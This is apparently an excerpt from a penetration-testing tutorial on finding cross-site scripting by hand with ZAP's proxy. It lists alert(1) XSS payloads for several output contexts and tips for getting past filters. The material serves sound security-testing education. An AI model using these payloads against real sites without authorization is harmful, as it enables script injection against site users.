Manual XSS Testing Strategies

Manual testing excels at finding complex XSS variants that automated scanning misses. Use ZAP's proxy to intercept requests containing user input. Start with basic payloads to understand application filtering. When basic payloads fail, analyze how the application modifies input. This analysis guides crafting bypasses specific to the application's filtering logic.

Context-aware payload crafting improves manual testing success. Identify where user input appears in responses—HTML body, attributes, JavaScript strings, or CSS. Each context requires specific payloads. HTML contexts might use <svg onload=alert(1)>, while JavaScript strings need ';alert(1);//. Understanding output context enables precise payload selection rather than blind payload spraying.

// Context-Specific XSS Payloads

// HTML Body Context
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

// HTML Attribute Context  
" onmouseover="alert(1)
' autofocus onfocus='alert(1)'>

// JavaScript String Context
';alert(1);//
\';alert(1);//
</script><script>alert(1)</script>

// JavaScript Template Literal
${alert(1)}

// CSS Context
</style><script>alert(1)</script>
expression(alert(1))

Filter bypass techniques evolve constantly as applications implement new defenses. When direct script injection fails, try HTML entity encoding, Unicode variations, or case mixing. Some filters block "script" but allow "ScRiPt" or "scrip%74". Others filter angle brackets but allow their encoded equivalents. Building a personal bypass technique library accelerates manual testing.